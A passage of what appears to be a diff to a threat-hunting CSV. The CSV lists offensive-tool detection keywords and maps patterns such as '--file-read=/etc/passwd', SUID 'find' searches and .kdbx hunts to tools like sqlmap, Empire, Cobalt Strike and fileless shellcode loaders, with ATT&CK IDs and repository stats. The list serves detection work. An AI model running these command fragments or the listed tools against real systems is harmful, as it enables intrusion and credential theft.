Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*File-Extensions-Wordlist.txt*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*fileless-elf-exec*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" -"*FilelessPELoader.cpp*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessPELoader.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessPELoader.vcxproj*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessPELoader-main*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*FilelessShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*FilelessShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*FilelessShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*FilelessShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessPELoader.cpp*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader.vcxproj*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessPELoader-main*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*FilelessShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*FilelessShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*filemsf.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*--file-read=/etc/passwd*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*files/BindShell.exe*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*--file-read=/etc/passwd*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*files/BindShell.exe*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*files/team-edward.py*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*filezilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*filezilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*finalrecon.py --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*find . -name spring-beans*.jar*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","N/A","N/A","4","335","106","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" -"*find / * -4000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*find / * -perm -2000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*find / * -regextype egrep -iregex*\.kdbx*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*find_and_load_coerce_methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*find / * -4000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -perm -2000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -regextype egrep -iregex*\.kdbx*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find_and_load_coerce_methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*find_domain.sh *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*find_payload(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*Find-4624Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-4648Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-4624Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-4648Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*FindAdminAccessComputers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Find-AdminLogonScripts.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" -"*find-allvulns*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*find-allvulns*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Find-AmsiAstSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiSignatures.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*Find-AppLockerLogs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-AVSignature*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-AppLockerLogs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 